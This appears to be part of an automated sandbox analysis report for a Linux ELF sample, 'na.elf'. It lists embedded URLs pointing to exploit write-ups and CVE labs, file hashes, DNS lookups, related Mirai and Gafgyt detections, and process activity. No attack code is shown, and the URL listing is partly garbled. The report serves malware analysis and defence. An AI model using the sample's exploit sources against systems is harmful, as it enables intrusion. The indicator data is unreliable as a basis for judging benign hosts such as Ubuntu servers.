                                                                                https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%na.elffalse
                                                                                  unknown
                                                                                  https://github.com/goharbor/harbor/issues/8951na.elffalse
                                                                                    unknown
                                                                                    https://www.cnblogs.com/-mo-/p/11295400.htmlna.elffalse
                                                                                      unknown
                                                                                      https://github.com/Loneyers/vuldocker/tree/master/next.jsna.elffalse
                                                                                        unknown
                                                                                        https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8Ana.elffalse
                                                                                          unknown
                                                                                          https://github.com/WhiteHSBG)na.elffalse
                                                                                            unknown
                                                                                            http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E4%B8%89%Ena.elffalse
                                                                                              unknown
                                                                                              https://github.com/shadown1ng)na.elffalse
                                                                                                unknown
                                                                                                https://hackfun.org/)na.elffalse
                                                                                                  unknown
                                                                                                  https://cloud.tencent.com/developer/article/1472550na.elffalse
                                                                                                    unknown
                                                                                                    https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAegna.elffalse
                                                                                                      unknown
                                                                                                      https://github.com/Sndav)na.elffalse
                                                                                                        unknown
                                                                                                        https://cwiki.apache.org/confluence/display/AMBARI/Quickna.elffalse
                                                                                                          unknown
                                                                                                          https://kb.cert.org/vuls/id/843464name:na.elffalse
                                                                                                            unknown
                                                                                                            http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8na.elffalse
                                                                                                              unknown
                                                                                                              https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861name:na.elffalse
                                                                                                                unknown
                                                                                                                https://www.seebug.org/vuldb/ssvid-98364na.elffalse
                                                                                                                  unknown
                                                                                                                  http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%BF%88%Ena.elffalse
                                                                                                                    unknown
                                                                                                                    https://github.com/masahiro331/CVE-2019-10758na.elffalse
                                                                                                                      unknown
                                                                                                                      https://medium.com/na.elffalse
                                                                                                                        unknown
                                                                                                                        https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.htmlna.elffalse
                                                                                                                          unknown
                                                                                                                          https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rcename:na.elffalse
                                                                                                                            unknown
                                                                                                                            https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071na.elffalse
                                                                                                                              unknown
                                                                                                                              https://blog.csdn.net/ge00111/article/details/72765210name:na.elffalse
                                                                                                                                unknown
                                                                                                                                https://github.com/tangxiaofeng7)na.elffalse
                                                                                                                                  unknown
                                                                                                                                  https://t.co/LfvbyBUhF5na.elffalse
                                                                                                                                    unknown
                                                                                                                                    http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8na.elffalse
                                                                                                                                      unknown
                                                                                                                                      http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548na.elffalse
                                                                                                                                        unknown
                                                                                                                                        https://www.cnblogs.com/milantgh/p/3615986.htmlna.elffalse
                                                                                                                                          unknown
                                                                                                                                          https://s.tencent.com/research/bsafe/474.htmlname:na.elffalse
                                                                                                                                            unknown
                                                                                                                                            https://xz.aliyun.com/t/7219na.elffalse
                                                                                                                                              unknown
                                                                                                                                              https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c7na.elffalse
                                                                                                                                                unknown
                                                                                                                                                https://github.com/vulhub/vulhub/tree/master/spark/unaccAnna.elffalse
                                                                                                                                                  unknown
                                                                                                                                                  https://www.tenable.com/cve/CVE-2020-14181na.elffalse
                                                                                                                                                    unknown
                                                                                                                                                    https://github.com/ThestaRY7/)na.elffalse
                                                                                                                                                      unknown
                                                                                                                                                      https://github.com/notwhy)na.elffalse
                                                                                                                                                        unknown
                                                                                                                                                        https://nifi.apache.org/docs/nifi-docs/rest-api/index.htmlna.elffalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.polaris-lab.com/index.php/archives/253/na.elffalse
                                                                                                                                                            unknown
                                                                                                                                                            https://github.com/PickledFish)na.elffalse
                                                                                                                                                              unknown
                                                                                                                                                              https://www.t00ls.net/articles-54436.htmlna.elffalse
                                                                                                                                                                unknown
                                                                                                                                                                https://github.com/whami-rootname:na.elffalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723na.elffalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.secpulse.com/archives/496.htmlname:na.elffalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://github.com/Mr-xn/spring-core-rcena.elffalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://github.com/FiveAourThe)na.elffalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://y4er.com/post/metinfo7-sql-tips/#sql-injection-2name:na.elffalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://nvd.nist.gov/vuln/detail/CVE-2018-17246na.elffalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10738na.elffalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736na.elffalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10737na.elffalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.mdna.elffalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://www.cnblogs.com/xiexiandong/p/12888582.htmlna.elffalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704name:na.elffalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://github.com/B1anda0)na.elffalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://github.com/hackgov)na.elffalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://seclists.org/oss-sec/2021/q3/188na.elffalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://securityaffairs.co/wordpress/91689/hacking/unpatched-critical-0-day-vbulletin.htmlna.elffalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://share.zabbix.com/na.elffalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://www.cnblogs.com/T0uch/p/14475551.htmlna.elffalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://max.book118.com/html/2017/0623/117514590.shtmname:na.elffalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://blog.csdn.net/xuandao_ahfengren/article/details/111402955na.elffalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          No contacted IP infos
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          daisy.ubuntu.comna.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 162.213.35.25
                                                                                                                                                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 162.213.35.25
                                                                                                                                                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 162.213.35.24
                                                                                                                                                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 162.213.35.25
                                                                                                                                                                                                          SecuriteInfo.com.ELF.Mirai-ASX.30448.25409.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 162.213.35.25
                                                                                                                                                                                                          SecuriteInfo.com.ELF.Mirai-ASX.19412.28677.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 162.213.35.25
                                                                                                                                                                                                          SecuriteInfo.com.ELF.Mirai-ASX.30910.661.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 162.213.35.24
                                                                                                                                                                                                          Qrbupua6pG.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                          • 162.213.35.25
                                                                                                                                                                                                          U1QSgEzo25.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 162.213.35.25
                                                                                                                                                                                                          OIW7aNSHbh.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 162.213.35.25
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No created / dropped files found
                                                                                                                                                                                                          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=wM6kBjb9eHuSI_m9ztZV/_ecWdW7cXIAIFBNy28FZ/LjN9KO1J_pwQJEX6-NpK/l7MDHPuKCwrtpwHuhp7a, stripped
                                                                                                                                                                                                          Entropy (8bit):5.659816902013565
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • ELF Executable and Linkable format (Linux) (4029/14) 49.77%
                                                                                                                                                                                                          • ELF Executable and Linkable format (generic) (4004/1) 49.46%
                                                                                                                                                                                                          • Lumena CEL bitmap (63/63) 0.78%
                                                                                                                                                                                                          File name:na.elf
                                                                                                                                                                                                          File size:21'190'032 bytes
                                                                                                                                                                                                          MD5:3539f5a048708ba8ae4ba0548538a769
                                                                                                                                                                                                          SHA1:fdffcbdae30e43e104fe372d4db58f4a61237bec
                                                                                                                                                                                                          SHA256:bc3e7c9378af55ad1000c721319b723e58543c1cb9d7aa6be2868a171fa89689
                                                                                                                                                                                                          SHA512:94a6093a1a62801b9dd4d217b5bbec1808598a527db00601fb500e1946aa8335963f7fd0f57b857a9d6af347a7d437b3239cd9d2d72dd259e9d0c27b7d0cb1b9
                                                                                                                                                                                                          SSDEEP:98304:uCDfnsXKsb3p9+T6M7ZHZyeEbMFsKuHAXA:rfduGZHwbbMFsKIb
                                                                                                                                                                                                          TLSH:2D27F643F4A2C0D4C199C130C625D6D7BAA1749A432423D33BED9FBB2F62BD45A7A325
                                                                                                                                                                                                          File Content Preview:.ELF..............>.....@.F.....@.......p...........@.8...@.............@.......@.@.....@.@.....0.......0.................................@.......@...............................................@.......@.....d.......d.................................@....
                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Oct 13, 2024 07:07:50.358396053 CEST5654853192.168.2.131.1.1.1
                                                                                                                                                                                                          Oct 13, 2024 07:07:50.358468056 CEST4530153192.168.2.131.1.1.1
                                                                                                                                                                                                          Oct 13, 2024 07:07:50.365225077 CEST53565481.1.1.1192.168.2.13
                                                                                                                                                                                                          Oct 13, 2024 07:07:50.365781069 CEST53453011.1.1.1192.168.2.13
                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Oct 13, 2024 07:07:50.358396053 CEST192.168.2.131.1.1.10x9c49Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Oct 13, 2024 07:07:50.358468056 CEST192.168.2.131.1.1.10x4f06Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                          Oct 13, 2024 07:07:50.365225077 CEST1.1.1.1192.168.2.130x9c49No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Oct 13, 2024 07:07:50.365225077 CEST1.1.1.1192.168.2.130x9c49No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          Start time (UTC):05:05:45
                                                                                                                                                                                                          Start date (UTC):13/10/2024
                                                                                                                                                                                                          Path:/usr/lib/systemd/systemd
                                                                                                                                                                                                          Arguments:-
                                                                                                                                                                                                          File size:1620224 bytes
                                                                                                                                                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                                                                                                                          Start time (UTC):05:05:45
                                                                                                                                                                                                          Start date (UTC):13/10/2024
                                                                                                                                                                                                          Path:/usr/lib/snapd/snap-failure
                                                                                                                                                                                                          Arguments:/usr/lib/snapd/snap-failure snapd
                                                                                                                                                                                                          File size:4764904 bytes
                                                                                                                                                                                                          MD5 hash:69136a7d575731ce62349f2e4d3e5c36

                                                                                                                                                                                                          Start time (UTC):05:05:45
                                                                                                                                                                                                          Start date (UTC):13/10/2024
                                                                                                                                                                                                          Path:/usr/lib/snapd/snap-failure
                                                                                                                                                                                                          Arguments:-
                                                                                                                                                                                                          File size:4764904 bytes
                                                                                                                                                                                                          MD5 hash:69136a7d575731ce62349f2e4d3e5c36

                                                                                                                                                                                                          Start time (UTC):05:05:45
                                                                                                                                                                                                          Start date (UTC):13/10/2024
                                                                                                                                                                                                          Path:/usr/bin/systemctl
                                                                                                                                                                                                          Arguments:systemctl stop snapd.socket
                                                                                                                                                                                                          File size:996584 bytes
                                                                                                                                                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                                                                                                          Start time (UTC):05:05:45
                                                                                                                                                                                                          Start date (UTC):13/10/2024
                                                                                                                                                                                                          Path:/usr/lib/snapd/snap-failure
                                                                                                                                                                                                          Arguments:-
                                                                                                                                                                                                          File size:4764904 bytes
                                                                                                                                                                                                          MD5 hash:69136a7d575731ce62349f2e4d3e5c36